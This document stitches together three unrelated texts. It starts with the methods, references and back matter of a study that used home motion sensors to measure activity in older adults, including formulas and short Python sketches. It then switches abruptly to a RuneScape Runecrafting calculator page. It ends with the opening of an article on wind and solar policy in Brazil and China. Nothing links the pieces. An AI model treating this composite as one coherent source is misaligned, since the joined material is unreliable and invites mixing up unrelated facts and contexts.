Clinical assessments were conducted at the beginning of the study and consisted of a battery of standardized tests, targeting well-being, cognitive and motor function. The cognitive and well-being part included the Montreal Cognitive Assessment (MoCA), the Geriatric Depression Scale (GDS) as well as EQ-5D-3L. The motor tests included the Tinetti Performance-Oriented Mobility Assessment (POMA), the Timed Up and Go (TUG) as well as muscle strength measurements for handgrip, knee extensor and hip flexor – for all three muscle-groups, the left and right-side strength was measured. The handgrip measurements were performed using a Jamar Plus + Dynamometer while knee and hip strength was assessed with a Lafayette® Manual Muscle Tester (Lafayette Instrument Company, Lafayette, Indiana).
In addition to the initial assessment, muscle strength and TUG measures were repeated every six weeks and, where possible, the whole initial battery was repeated after one year (a different version of the MoCA was used there to avoid memory effects). Throughout the whole study duration, the subjects were visited or contacted on a weekly basis to stay informed about sudden changes in health or lifestyle. As part of these visits, the participants were asked to fill out EQ-5D-3L questionnaires, including EQ-VAS scores.
More information regarding subject demographics and characteristics is summarized in Table 1.
### Sensor setup
The presented data was obtained using the commercial DomoCare® home monitoring system for seniors (DomoSafety S.A., Lausanne, Switzerland)15. This system included five passive infrared (PIR) motion sensing units and two magnetic door sensors that communicate with a base unit via the Zigbee protocol. The motion sensors measure presence or absence of motion once every two seconds (0.5 Hz). The base unit manages the data and sends it to the cloud in real-time using the GSM network. The subject’s kitchen, living room, entrance, bedroom and bathroom were each equipped with one PIR-sensor (see Fig. 4).
The two door sensors were placed at the fridge and entrance doors. Wherever possible, the sensors were placed at the exact same locations in each apartment. Due to furniture-related constraints, some placements varied slightly but were kept as comparable as possible.
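To make the derivation of the daily quantities concrete, the following minimal Python sketch shows how per-day motion time and room-transition counts could be accumulated from a time-sorted log of the 0.5 Hz PIR samples described above. The record layout and function name are our own illustrative assumptions, not the study's code, and door-sensor based presence detection (needed for t_inside) is omitted:

```python
from collections import defaultdict

def daily_aggregates(events, sample_period_s=2.0):
    """Accumulate per-day motion seconds and room-transition counts.

    `events` is assumed to be a time-sorted iterable of tuples
    (timestamp: datetime, room: str, motion: bool), one sample
    every two seconds per sensor (0.5 Hz).
    """
    t_motion = defaultdict(float)     # day -> seconds with detected motion
    n_transitions = defaultdict(int)  # day -> number of room transitions
    last_room = None
    for ts, room, motion in events:
        day = ts.date()
        if motion:
            t_motion[day] += sample_period_s
            # A transition is counted when motion appears in a
            # different room than the previous motion event.
            if last_room is not None and room != last_room:
                n_transitions[day] += 1
            last_room = room
    return t_motion, n_transitions
```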
### Data analysis
The clinical tests and muscle measurements were aggregated by averaging, where not otherwise mentioned. The sensor data were first pre-processed to remove days with extremely high or low activity (based on the 1st and 99th percentiles of a maximum-likelihood fitted normal distribution). Subsequently, the activity metrics for sensor activity and the number of room-transitions were calculated daily, for each participant:
$$\begin{array}{rcl}{\hat{\mu}}_{i}^{ac} & = & \dfrac{1}{n_{days}}\displaystyle\sum_{j=1}^{n_{days}}\mathrm{sensor\_activity}_{j}\\[6pt] \mathrm{sensor\_activity}_{j} & = & \dfrac{t_{motion}}{t_{inside}}\times 100,\end{array}$$
(1)
$$\begin{array}{rcl}{\hat{\mu}}_{i}^{tr} & = & \dfrac{1}{n_{days}}\displaystyle\sum_{j=1}^{n_{days}}\mathrm{room\_transitions\_per\_hour}_{j}\\[6pt] \mathrm{room\_transitions\_per\_hour}_{j} & = & \dfrac{\#tr}{t_{inside}/3600\,\frac{\mathrm{s}}{\mathrm{h}}},\end{array}$$
(2)
Here, $n_{days}$ refers to a subject’s number of recorded days, while $j$ references a specific day. The parameter $t_{motion}$ represents the number of seconds in which the PIR sensors detected motion on day $j$, $t_{inside}$ represents the number of seconds the person was at home on day $j$, and $\#tr$ represents the number of times the person transitioned between the different rooms of the apartment on day $j$, as measured by the PIR sensors. For the comparison of baseline differences, the sample means across all included days (${\hat{\mu}}_{i}$) of subject $i$ were calculated for both metrics. The coefficient of variation, $CV_{i}$, of subject $i$ was derived by dividing the sample standard deviation ${\hat{\sigma}}_{i}$ by the sample mean ${\hat{\mu}}_{i}$ of the respective physical activity metric:
$$C{V}_{i}=\frac{{\hat{\sigma}}_{i}}{{\hat{\mu}}_{i}},\qquad {\hat{\mu}}_{i}=\frac{1}{n_{days}}\sum_{j=1}^{n_{days}}x_{j},\qquad {\hat{\sigma}}_{i}=\sqrt{\frac{1}{n_{days}-1}\sum_{j=1}^{n_{days}}{(x_{j}-{\hat{\mu}}_{i})}^{2}},$$

where $x_{j}$ denotes the value of the respective daily activity metric on day $j$.
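As an illustration of the preprocessing and per-subject aggregation described above, a minimal Python sketch (ours, not the authors' code) might look as follows, assuming one metric value per recorded day:

```python
import numpy as np
from scipy.stats import norm

def subject_summary(daily_values):
    """Mean and CV of one subject's daily activity metric.

    Days outside the 1st/99th percentile of a maximum-likelihood
    fitted normal distribution are discarded first, mirroring the
    preprocessing step described above.
    """
    x = np.asarray(daily_values, dtype=float)
    mu, sigma = norm.fit(x)                     # ML estimates of N(mu, sigma)
    lo, hi = norm.ppf([0.01, 0.99], mu, sigma)  # 1st and 99th percentiles
    kept = x[(x >= lo) & (x <= hi)]
    mu_hat = kept.mean()                        # sample mean over included days
    cv = kept.std(ddof=1) / mu_hat              # CV_i = sigma_i / mu_i
    return mu_hat, cv
```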
To calculate the correlations between the assessments and the activity metrics (matrix $\boldsymbol{R}$, as visualized in Fig. 1), the nonparametric Spearman’s rank correlation coefficient $\rho_{kl}$ between mean-aggregated assessment results ($\boldsymbol{C}_{l}$) and average activity metrics ($\boldsymbol{A}_{k}$) was used. Here, $\boldsymbol{C}_{l}$ and $\boldsymbol{A}_{k}$ denote the $l$th and $k$th columns of the matrices $\boldsymbol{C}$ and $\boldsymbol{A}$, respectively.
$$({\boldsymbol{R}})_{kl}={\rho}_{kl}=\mathrm{Corr}({\boldsymbol{A}}_{k},{\boldsymbol{C}}_{l}),\qquad {\boldsymbol{R}}\in{\mathbb{R}}^{4\times 14}$$

$${\boldsymbol{A}}=\begin{bmatrix}{\hat{\mu}}_{1}^{ac} & C{V}_{1}^{ac} & {\hat{\mu}}_{1}^{tr} & C{V}_{1}^{tr}\\ \vdots & \vdots & \vdots & \vdots \\ {\hat{\mu}}_{i}^{ac} & C{V}_{i}^{ac} & {\hat{\mu}}_{i}^{tr} & C{V}_{i}^{tr}\\ \vdots & \vdots & \vdots & \vdots \\ {\hat{\mu}}_{M}^{ac} & C{V}_{M}^{ac} & {\hat{\mu}}_{M}^{tr} & C{V}_{M}^{tr}\end{bmatrix},\qquad {\boldsymbol{A}}\in{\mathbb{R}}^{M\times 4}$$

$${\boldsymbol{C}}=\begin{bmatrix}{c}_{1}\\ \vdots \\ {c}_{i}\\ \vdots \\ {c}_{M}\end{bmatrix},\qquad {c}_{i}=[{s}_{1}^{i},\ldots,{s}_{14}^{i}],\qquad {\boldsymbol{C}}\in{\mathbb{R}}^{M\times 14}$$
where the $i$th row of matrix $\boldsymbol{A}$ encodes the four activity metrics, $({\hat{\mu}}_{i}^{ac},C{V}_{i}^{ac},{\hat{\mu}}_{i}^{tr},C{V}_{i}^{tr})$, of participant $i$ and the $i$th row of matrix $\boldsymbol{C}$ encodes the fourteen clinical assessment results, $({s}_{1}^{i},\ldots,{s}_{14}^{i})$, of participant $i$. There are $M = 13$ participants in total. Furthermore, to assess the importance of individual correlations, a significance level of $\alpha = 0.05$ was employed.
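The correlations themselves were computed in R (see below); for illustration, an equivalent Python sketch using scipy (an assumption on our part, not the authors' pipeline) could look like this, with `A` and `C` being the matrices defined above:

```python
import numpy as np
from scipy.stats import spearmanr

def correlation_matrix(A, C, alpha=0.05):
    """Spearman correlations between columns of A (M x 4 activity
    metrics) and C (M x 14 assessment scores).

    Returns R (4 x 14) and a boolean mask of entries with p < alpha.
    """
    R = np.zeros((A.shape[1], C.shape[1]))
    significant = np.zeros_like(R, dtype=bool)
    for k in range(A.shape[1]):
        for l in range(C.shape[1]):
            rho, p = spearmanr(A[:, k], C[:, l])
            R[k, l] = rho
            significant[k, l] = p < alpha
    return R, significant
```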
Preprocessing and calculation of activity measures were done using the Python programming language version 3.6 (Python Software Foundation). Correlations and their significance were calculated using the R programming language version 3.5.1 (R Foundation for Statistical Computing, Vienna, Austria). Graphical illustrations and plots were created using both above-mentioned programming languages as well as Blender version 2.79 (Blender Institute, Amsterdam, Netherlands).
## Data and Code Availability
The data and code underlying the reported results are available upon request.
## References
1. Powell, K. E., Paluch, A. E. & Blair, S. N. Physical activity for health: What kind? How much? How intense? On top of what? Annu. Rev. Public Health 32, 349–65 (2011).
2. 2018 Physical Activity Guidelines Advisory Committee. 2018 Physical Activity Guidelines Advisory Committee Scientific Report. Washington, DC: U.S. Department of Health and Human Services (2018).
3. Yates, L. B., Djoussé, L., Kurth, T., Buring, J. E. & Gaziano, J. M. Exceptional Longevity in Men. Arch. Intern. Med. 168, 284 (2008).
4. Buchman, A. S. et al. Total daily physical activity and the risk of AD and cognitive decline in older adults. Neurology 78, 1323–9 (2012).
5. Touvier, M. et al. Changes in leisure-time physical activity and sedentary behaviour at retirement: a prospective study in middle-aged French subjects. Int. J. Behav. Nutr. Phys. Act. 7, 14 (2010).
6. Jackson, A. S., Sui, X., Hébert, J. R., Church, T. S. & Blair, S. N. Role of Lifestyle and Aging on the Longitudinal Change in Cardiorespiratory Fitness. Arch. Intern. Med. 169, 1781–1787 (2009).
7. Jonkman, N. H., van Schooten, K. S., Maier, A. B. & Pijnappels, M. eHealth interventions to promote objectively measured physical activity in community-dwelling older people. Maturitas 113, 32–39 (2018).
8. Wild, K. V., Mattek, N., Austin, D. & Kaye, J. A. “Are You Sure?”. J. Appl. Gerontol. 35, 627–641 (2016).
9. Lyons, B. E. et al. Pervasive Computing Technologies to Continuously Assess Alzheimer’s Disease Progression and Intervention Efficacy. Front. Aging Neurosci. 7, 102 (2015).
10. Murphy, S. L. Review of physical activity measurement using accelerometers in older adults: Considerations for research design and conduct. Prev. Med. 48, 108–114 (2009).
11. Saha, D. & Mukherjee, A. Pervasive computing: a paradigm for the 21st century. Computer 36, 25–31 (2003).
12. Rantz, M. J. et al. Sensor technology to support Aging in Place. J. Am. Med. Dir. Assoc. 14, 386–91 (2013).
13. Scanaill, C. N. et al. A Review of Approaches to Mobility Telemonitoring of the Elderly in Their Living Environment. Ann. Biomed. Eng. 34, 547–563 (2006).
14. Zhang, Y. & Wu, M. Design of Wireless Remote Module in X-10 Intelligent Home. In IEEE International Conference on Industrial Technology 1349–1353, https://doi.org/10.1109/ICIT.2005.1600845 (IEEE 2005).
15. DomoSafety S.A. Available at http://www.domo-safety.com/ (Accessed: 16th September 2018).
16. Song, B., Choi, H. & Lee, H. S. Surveillance Tracking System Using Passive Infrared Motion Sensors in Wireless Sensor Network. In 2008 International Conference on Information Networking 1–5, https://doi.org/10.1109/ICOIN.2008.4472790 (IEEE 2008).
17. Srinivasan, S., Han, J., Lal, D. & Gacic, A. Towards automatic detection of falls using wireless sensors. In 2007 29th Annual International Conference of the IEEE Engineering in Medicine and Biology Society 1379–1382, https://doi.org/10.1109/IEMBS.2007.4352555 (IEEE 2007).
18. Popescu, M., Hotrabhavananda, B., Moore, M. & Skubic, M. VAMPIR – An Automatic Fall Detection System Using a Vertical PIR Sensor Array. In Proceedings of the 6th International Conference on Pervasive Computing Technologies for Healthcare, https://doi.org/10.4108/icst.pervasivehealth.2012.248759 (IEEE 2012).
19. Moshtaghi, M., Zukerman, I., Albrecht, D. & Russell, R. A. 139–151, https://doi.org/10.1007/978-3-642-38844-6_12 (Springer, Berlin, Heidelberg 2013).
20. Aran, O., Sanchez-Cortes, D., Do, M.-T. & Gatica-Perez, D. 51–67, https://doi.org/10.1007/978-3-319-46843-3_4 (Springer, Cham 2016).
21. Galambos, C., Skubic, M., Wang, S. & Rantz, M. Management of Dementia and Depression Utilizing In-Home Passive Sensor Data. Gerontechnology 11, 457–468 (2013).
22. Hayes, T. L. et al. Unobtrusive assessment of activity patterns associated with mild cognitive impairment. Alzheimers. Dement. 4, 395–405 (2008).
23. Urwyler, P. et al. Cognitive impairment categorized in community-dwelling older adults with and without dementia using in-home sensors that recognise activities of daily living. Sci. Rep. 7, 42084 (2017).
24. Nasreddine, Z. S. et al. The Montreal Cognitive Assessment, MoCA: A Brief Screening Tool For Mild Cognitive Impairment. J. Am. Geriatr. Soc. 53, 695–699 (2005).
25. Yesavage, J. A. & Sheikh, J. I. Geriatric Depression Scale (GDS): Recent evidence and development of a shorter version. Clin. Gerontol. 5, 165–173 (1986).
26. EuroQol. EQ-5D-3L – EQ-5D. Available at https://euroqol.org/eq-5d-instruments/eq-5d-3l-about/ (Accessed: 30th September 2018).
27. Podsiadlo, D. & Richardson, S. The Timed “Up & Go”: A Test of Basic Functional Mobility for Frail Elderly Persons. J. Am. Geriatr. Soc. 39, 142–148 (1991).
28. Tinetti, M. E. Performance-Oriented Assessment of Mobility Problems in Elderly Patients. J. Am. Geriatr. Soc. 34, 119–126 (1986).
29. Teychenne, M., Ball, K. & Salmon, J. Physical activity and likelihood of depression in adults: A review. Prev. Med. 46, 397–411 (2008).
30. Halaweh, H., Willen, C., Grimby-Ekman, A. & Svantesson, U. Physical Activity and Health-Related Quality of Life Among Community Dwelling Elderly. J. Clin. Med. Res. 7, 845–52 (2015).
31. Acree, L. S. et al. Physical activity is related to quality of life in older adults. Health Qual. Life Outcomes 4, 37 (2006).
32. Campbell, I. H. et al. Measuring changes in activity patterns during a norovirus epidemic at a retirement community. In 2011 Annual International Conference of the IEEE Engineering in Medicine and Biology Society 6793–6796, https://doi.org/10.1109/IEMBS.2011.6091675 (IEEE 2011).
33. Rantz, M. J. et al. Using sensor networks to detect urinary tract infections in older adults. In 2011 IEEE 13th International Conference on e-Health Networking, Applications and Services 142–149, https://doi.org/10.1109/HEALTH.2011.6026731 (IEEE 2011).
34. Taiyun, W. & Viliam, S. R package ‘corrplot’: Visualization of a Correlation Matrix (Version 0.84) (2017).
## Acknowledgements
We would like to thank all subjects for their participation. In addition, we thank everyone involved in gathering the presented data, in particular we would like to thank Romina Saurer for her valuable help in data gathering. This study was partially funded by the Swiss Commission for Technology and Innovation (CTI) through the SWISKO project (17662.2 PFES-ES).
## Author information
### Contributions
N.S., H.S., B.P., V.S., P.B., D.G., P.U., L.M., R.M.M. and T.N. designed and planned the study. N.S., H.S. and B.R. installed and maintained the system and measured the participants. N.S. and A.B. analysed the data. N.S., A.B., P.U. and T.N. wrote the manuscript. All authors reviewed and approved the final manuscript.
### Corresponding author
Correspondence to Tobias Nef.
## Ethics declarations
### Competing Interests
Dr. Philipp Buluschek is employed by DomoSafety S.A., which is the manufacturer of the displayed sensor system. The remaining authors declare no potential conflict of interest.
Publisher’s note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
## Rights and permissions
Schütz, N., Saner, H., Rudin, B. et al. Validity of pervasive computing based continuous physical activity assessment in community-dwelling old and oldest-old. Sci Rep 9, 9662 (2019). https://doi.org/10.1038/s41598-019-45733-8
"Runecrafting calculator" redirects here. See also Calculator:Runecrafting/Profit per trip and Calculator:Runecrafting/Multiple runes.
template = Calculator:Template/Runecrafting
form = Form
result = Result
param = xplvlc|Calculate current level or XP?|Level|select|Level,Experience
param = nowxp|Your current level/XP (per above)|1|number|
param = xplvld|Calculate desired level or XP?|Level|select|Level,Experience
param = wantxp|Your desired level/XP (per above)|2|number|
param = abyss|Runecrafting in the Abyss?|No|select|Yes,No,Skull
param = ess|Essence carried per load|28|number|1-118
param = tiara|Tiaras carried per load|14|number|0-14
The form will appear here when it loads. If it fails to load, you can still calculate with the formulas given below.

This calculator will determine:
* How many runes you will have to craft to reach your desired level or XP amount.
* The total cost of the essence required to do so.
* The return value if you choose to sell the runes.

The calculator assumes that:
* You will only be crafting one type of rune to reach the desired level.
* You will be using the least expensive form of essence for the rune you are crafting.
* You craft only one rune per essence (this may be fixed in the future).

Methods in yellow are above the current level.

Essence amounts:
* Inventory = 28
* Small Pouch = +3
* Medium Pouch = +6
* Large Pouch = +9
* Giant Pouch = +12
* Massive Pouch = +17
* Abyssal Parasite = +7
* Abyssal Lurker = +12
* Abyssal Titan = +20
* Partial Ethereal Outfit = +6
* Infinity Ethereal Outfit = +12
* Morytania Legs 2 = +10% (blood runes only)
* Explorer's Ring 2 = +10% (air/water/fire/earth runes only)
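If the form fails to load, the core computation can also be reproduced offline. The following Python sketch (function names are ours) assumes the standard RuneScape experience curve and one rune per essence, mirroring the calculator's assumptions:

```python
import math

def xp_for_level(level):
    """Total XP at a given level, using the standard RuneScape
    experience curve (e.g. level 2 = 83 XP)."""
    points = sum(math.floor(n + 300 * 2 ** (n / 7)) for n in range(1, level))
    return points // 4

def runes_needed(current_level, desired_level, xp_per_rune):
    """Runes to craft between two levels, assuming one rune per
    essence and a fixed XP yield per rune (see the Runecrafting
    XP tables for the exact value per rune type)."""
    gap = xp_for_level(desired_level) - xp_for_level(current_level)
    return math.ceil(max(gap, 0) / xp_per_rune)

# Example: air runes yield 5 XP each, so from level 50 to 75:
# runes_needed(50, 75, 5)
```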
## Abstract
This article examines developments in the renewable electricity sector in Brazil and China since 2000. The two countries share many interests with respect to solar and wind power, but institutional differences in state–business relations led to different outcomes. In China, in a context of corporatist state–business relations, state interventions were more far-reaching, with the state coordinating with state-owned banks, offering large financial and investment incentives to state-owned or state-connected enterprises. By contrast, in Brazil’s public–private partnerships, state support to promote renewable energies was shaped by a stronger preference for competitive auctions and stricter financing rules. The differences in state–business relations help explain the observed developmental trajectories in wind and solar power.
International climate negotiations have largely foundered, in part due to conflicting expectations about the role that large emerging powers like China and Brazil should play in reducing their greenhouse gas (GHG) emissions. Their record economic growth rates after 2000 have been accompanied by an equally rapid rise in emissions, and the energy investments they are making to support their economic growth will lock in emissions levels for decades to come. Even as they grow quickly, the emerging powers continue to have millions of poor citizens, and they have made it clear that any climate mitigation action must be responsive to national development needs.1
We take the claim that development is a priority as our starting point in this article, where we examine developments in the renewable electricity sector in Brazil and China since 2000. Renewable energies were almost non-existent in both countries in the 1990s, but over the past decade China expanded its generation of wind and solar power while gaining world leadership in both industries. Brazil now generates substantial wind power and has a thriving wind industry, though solar power lags. Both countries have twinned their renewable electricity procurement with policies to develop related industrial capacity—they do not want to just install imported components—but they have done so in different ways and with distinct outcomes. What explains the differences in the policies initiated and in the development and climate emissions outcomes? We draw on explanatory variables from classic comparative politics theories to answer those questions, examining the roles of interests and institutions in determining policies and outcomes.2
We argue that the two countries share many interests with respect to renewable energy, but institutional differences in state–business relations have led to different outcomes. In Brazil, a public–private partnership approach played a key role in promoting wind generation and a new wind industry, but left the solar sector largely moribund. In China, a state corporatist approach meant that the political agendas of national and local governments, as well as the vested interests of powerful state-owned enterprises (SOEs) and state-backed enterprises, shaped policy outcomes.
Our analysis draws on original fieldwork conducted in Brazil and China between 2010 and 2014. In Brazil, we interviewed officials in the energy planning agencies and Brazilian National Economic and Social Development Bank (BNDES), as well as industry and community representatives. In China, we conducted fieldwork in Beijing as well as in Hunan, Jiangsu, and Shandong provinces. The analysis also draws from government policy documents, media reports, and available secondary sources.
## Interests, Institutions, and Renewable Sources of Electricity
Why do countries build the electricity infrastructure that they do, and why might they turn to renewable fuel sources for electricity? Many studies of these choices generate straightforward answers related to the energy endowments of a country and the technical ease and cost of developing them.3 Assessing the changing balance of concrete material interests is a powerful analytical tool for understanding phenomena like energy system transitions.4 States have distinct endowments in the fuel sources that could be used to power electricity plants; these tend to form the foundation of powerful coalitions supporting the continued use of abundant, cheap fuels. State and market actors also pay close attention to signals like the initially high, but then rapidly dropping, prices of renewable electricity technology after 2000.
Policymakers in Brazil and China have many of the same interests in deploying solar and wind energies. Wind and solar power improve local air pollution and help national leaders meet international climate change commitments. Renewable energy also helps to address domestic energy security concerns. Installing and running wind and solar farms bring potential economic benefits, although benefits are greater if local industries are established to produce components. In this article, we consider how recent developments may be changing those interest calculations.
However, our findings indicate that institutional differences may be as important as interests in determining how that transition takes place, and even in shaping the outcomes. In making this argument, we draw on a strong tradition in the study of comparative environmental politics of placing institutions—typically federal versus unitary arrangements or systems of interest representation—at the center of explanations of environmental performance.5 Over several decades, scholars have especially used cross-national variation in state–society relations to explain differences in environmental outcomes.6 Most concluded that neo-corporatist institutions lead to better environmental outcomes than pluralist configurations. In corporatism, the close, repeated interactions between the state and centrally organized business interests are thought to build trust, generate better information, and help solve collective action problems.
In discussions of the electricity sector itself, state–society relations take center stage. Here the specific focus is less on the system of interest representation per se (e.g., corporatist vs. pluralist) and more on the balance of interests between state and private market actors in a particular sector. Much of this literature departs from the stylized opposition of state-centered and market-centered approaches. In the former, state ministries and SOEs operated monopoly electricity sectors together, often drawing on subsidized state capital resources and playing a number of social functions beyond mere electricity provision.7 Market-centered approaches were created by the neoliberal “standard reform model” applied around the world in the 1980s and 1990s. In this model, the electricity sector was unbundled and privatized while independent regulatory agencies were established to oversee the reformulated sector, hewing to market criteria.8
The virtues and problems of the state-centered model were evident in concrete historical outcomes. On the positive side, the state-centered model could take advantage of economies of scale, with the state coordinating industrial sectors and acting as a guardian for the public interest and national economic development9—not unlike the advantages associated with the corporatist system of representation. On the negative side, the model was blamed both for tending towards over-investment (when states had capital) and for failing to discipline demand and invest sufficiently (when states lacked capital). Without market-clearing prices, electricity provision was both expensive and inefficient.10 The results of the market-centered approach are less clear, in part because the model was rarely fully implemented, leaving hybrid approaches with nationally idiosyncratic outcomes.11 On the topic of interest here—the adoption of renewable electricity—there was no relationship between economic reforms and carbon emissions for developing countries.12
Because of our limited understanding of recent state-centered or market-centered approaches on climate and energy issues, there is a need for the kind of detailed qualitative case study of two important emerging powers presented here. These two countries partially implemented market reforms in their electricity sectors, with Brazil’s being more complete than China’s. Thus the two cases allow us to look more closely at the relationship between hybrid models and renewable electricity outcomes. Broadly speaking, we would expect the Chinese approach to more closely follow the expectations of the state-centered model. However, both cases have particular national characteristics that shape outcomes.
Brazil’s hybrid electricity sector sets up an electricity political economy that toggles between national public planning, procurement, and financing agencies and an increasingly private generation sector.13 This public–private partnership approach came to include a number of state supports for the renewable energy sector after 2002, but since 2009 it also imposed a competitive auction system that disciplined prices. The independent regulator holds regular auctions for licenses to supply electricity to the national grid, with both public and private generation firms participating; those that promise to supply electricity at the lowest prices win. Similarly, BNDES provides credit for many projects at subsidized rates, but also then insists on repayment.
In China, state–business relations can best be described as state corporatist. The ongoing centrality of the state and state-owned or state-backed enterprises in the political economy and its authoritarian decentralized governance structure locate the calculation of interests primarily in complex relations between central and local governments.14 The state works with SOEs and mixed-ownership firms to develop a globally competitive renewable energy sector.15 The state retains overall control of the market, sets the rules, and controls market entry. In view of heavy state control of access to valuable resources, businesses typically seek to establish close ties to state agents. A unique feature of the Chinese case is the relatively large discretion accorded to local governments in guiding economic development, giving Chinese state corporatism a decidedly local character.16
In the next section, we provide a brief overview of the Chinese and Brazilian electricity sectors that shows some of the factors that established the initial constellations of interests in each. Following this, sections on each country and their institutional framework for electricity detail how those interests have been reshaped in distinct contexts.
## Renewable Fuel Sources in the Chinese and Brazilian Electricity Grids
Brazil and China use strikingly different fuel sources for their national electricity generation. As Table 1 shows, each draws more than two-thirds of its electricity from a single source, coal in China and hydropower in Brazil.
Table 1
Installed Electricity Generation Capacity by Fuel Type, 2011
| Fuel Type | Brazil (gigawatts) | Brazil % | China (gigawatts) | China % |
| --- | --- | --- | --- | --- |
| Total | 119.1 | 100 | 1100.5 | 100 |
| Fossil fuels | 22.4 | 19 | 766.0 | 70* |
| Hydro | 82.5 | 69 | 231.0 | 21 |
| Nuclear | 1.9 | | 11.8 | |
| Wind | 1.4 | | 62.4 | |
| Solar | 0.0 | 0.03 | 3.1 | 0.28 |
| Biomass | 10.9 | | 8.2 | |
| Other | 0.0 | | 18.0 | |

\* Installed capacity of coal is 66 percent.

Sources: EIA, 2011.
Table 1 shows that alternative renewable electricity sources like wind and solar power still constitute only a small percentage of each country’s national electricity matrix. In contrast, Table 2 reveals substantial changes since 2000 in both countries. New construction increasingly turns to wind and solar power and their rate of growth indicates that an energy transition is underway.
Table 2
Evolution of Wind and Solar Generation Capacity over Time (megawatts)
| | Installed Wind 2000–2001 | Installed Wind 2013 | Installed Solar 2000 | Installed Solar 2013 |
| --- | --- | --- | --- | --- |
| Brazil | 28 | 1,805 | n.a. | 20 |
| China | 340 | 91,000 | 19 | 18,100 |

Sources: EPE 2013, 99; EPE 2012, 1; GWEC 2014; EIA 2014; Leite 2009, 162; Zhang et al. 2013a, 326.
Each country has environmental reasons to turn away from its incumbent fuel. The overreliance on coal, combined with rapid urbanization, created air and water pollution crises around China. It became the world’s largest emitter of GHGs in 2007 and the biggest energy consumer in the world in 2010.17 Brazil’s large hydropower plants are generally much cleaner, but studies have found varying amounts of methane emissions associated with them.18 Other environmental and social costs are high, and Brazil has difficulty developing additional large hydropower plants as a result.
Power supply shortages in 2001 (Brazil) and 2002 and 2005 (China) gave additional incentives to expand and diversify the electricity matrix and help account for the timing of changes we observe.19 However, the energy transition is uneven and incomplete in both countries, with solar power installation lagging well behind wind power generation in China and still largely missing in Brazil. China’s transition has been much quicker than Brazil’s, with rapid scaling up of installed capacity, although solar power expanded primarily after the financial crisis in 2009.20
Similar patterns are even clearer in the extent to which these countries now manufacture the components of wind and solar plants rather than simply installing imported versions of them. This is the second dimension of the political economy of the new renewables we consider. China now has 70 domestic manufacturers of wind turbines, and the six largest Chinese “national champions” were among the top 15 global wind turbine manufacturers, accounting for 26 percent of total market share in 2013.21 The technical capacities of these companies have developed rapidly. By 2014, the quality gap between Chinese and foreign manufacturers was offset by a much more significant price gap.22 Brazil also managed to nationalize some wind production with turbine, tower, and parts manufacturers.23
The expansion of solar photovoltaic (PV) manufacturing in China is even more impressive, as it became the largest producer of solar PV modules in the world in 2008, overtaking Japan and Germany. Solar PV production rose from 2 percent of global production in 2003 to 64 percent in 2012.24 The nine largest Chinese manufacturers accounted for 30 percent of total market share in 2011.25 The technical capabilities of Chinese solar PV manufactures have continuously improved.26 In contrast, Brazil currently has very limited production capacity in solar power.
In the next sections, we examine the interests and institutions that created these outcomes in greater detail. We pay attention to state policies intended to generate demand for renewable electricity, as well as those intended to generate supply. While both countries developed green industrial policies to promote new renewables, related policies have had variable effects under different institutional settings.
## Brazilian National Renewable Energy Programs and Incentives
Brazil built very little new electricity generation capacity in the 1990s, and a severe drought in 2001 and resulting widespread blackouts brought the system into crisis. In 2002 the Cardoso presidency initiated the Program of Incentives for Alternative Energy in Electricity (Proinfa). Thus what Brazil calls “alternative renewables”—wind, solar, small hydro, and biomass—were first promoted to reduce the system’s over-reliance on large hydro.27
Proinfa at first set a feed-in tariff (FIT) to add 1100 megawatts (MW) each of wind, small hydro, and biomass-based electricity to the system, with 20-year contracts for independent power producers. Proinfa called for a second stage wherein renewable energy would reach 10 percent of national electricity consumption by 2022.28 The new Lula administration amended the law the next year,29 introducing an auction system. Both FITs and auctions, with long-term contracts, provide the kind of guaranteed demand necessary to draw private generation firms into the sector.
Both versions of Proinfa included national content requirements. These rested on economic calculations within the Ministry of Mines and Energy that the additional costs of adding renewable energy to the grid could be offset in the long run if such requirements successfully localized production and innovation in the sector.30 The Cardoso administration called for a 50-percent national content requirement only in the first stage of Proinfa—the kind of disciplining often favored by market-oriented proponents of industrial policy, but the Lula administration required 60-percent national content in the first stage and 90 percent in a second stage that was never implemented.31 The leftist Lula administration favored renewable energy as a central element of a modern economy in which the state would support Brazil’s innovation capacities and global competitiveness.32
The sense that green industries are part of the economy of the future was repeated in interviews, including within the Brazilian national development bank, BNDES.33 BNDES’ total lending portfolio more than doubled in size from 2002 to 2012, and the electricity and gas sector was a top recipient almost every year.34 BNDES, which is mandated to promote employment in Brazil and has its own domestic content requirements, has effectively become the guarantor of ongoing national production, particularly after the second stage of Proinfa was cancelled in favor of moving directly to auctions with no explicit local content minimums. BNDES has made about 300 project finance loans in the energy sector since 2004, and only one has been non-performing.35
The Brazilian political economy under Lula and his successor Dilma Rousseff (both of the Workers’ Party, Partido dos Trabalhadores) has been broadly pro-business,36 and the public–private partnerships of electricity generation in Brazil fit that model well. State actors must be sensitive to firms’ requirements, since electricity providers will sit out auctions if the renewable electricity contracts offered are not lucrative enough, as they did in a wind-only auction in 2008.37 But Brazilian auctions are also constructed with many compliance mechanisms that are usually flexibly applied.38 The two-stage auctions pit firms against each other, and the resulting tariffs are substantially lower and less profitable than was the case for the FIT. Winning bid prices are now almost too low for successful realization of the bids.39 This outcome supports the Brazilian state’s other major concern, which is to keep prices for consumers and industry low.
### Wind Power
The programs outlined above summarize the most significant interventions to promote wind power in Brazil. The demand and supply sides have been tightly interwoven. In the Proinfa program, as already noted, demand for wind power for the national grid was directly linked to the requirement of 60 percent local content. After the Proinfa program unofficially ended in 2008, reserve auctions for wind in 2009, 2010, 2011, and 2012 continued to present substantial demand. (While many Brazilian electricity auctions are open to plants using any fuel type, reserve auctions ask for bids for specific fuel types.) These auctions did not formally require local content production, but the only bids low enough to win the auctions were those with financing from BNDES—the development bank’s subsidized rates for wind generation are about 4 percent below market rates.40
The growth in wind power itself is clear: from essentially no generation capacity, Brazil has contracted to have 8.4 gigawatts (GW) of installed capacity in its national grid by 2017.41 Proinfa established the critical initial demand levels to kickstart a wind generation industry from almost nothing. Its FIT was high enough to attract both generation firms and financiers, even though none had much experience with wind power.42 As prices fell from Proinfa’s $150/megawatt-hour (MWh) to an average of $84.79 in the 2009 auction and $42.09 in 2012,43 participants became more specialized and the winning firms have grown steadily larger.

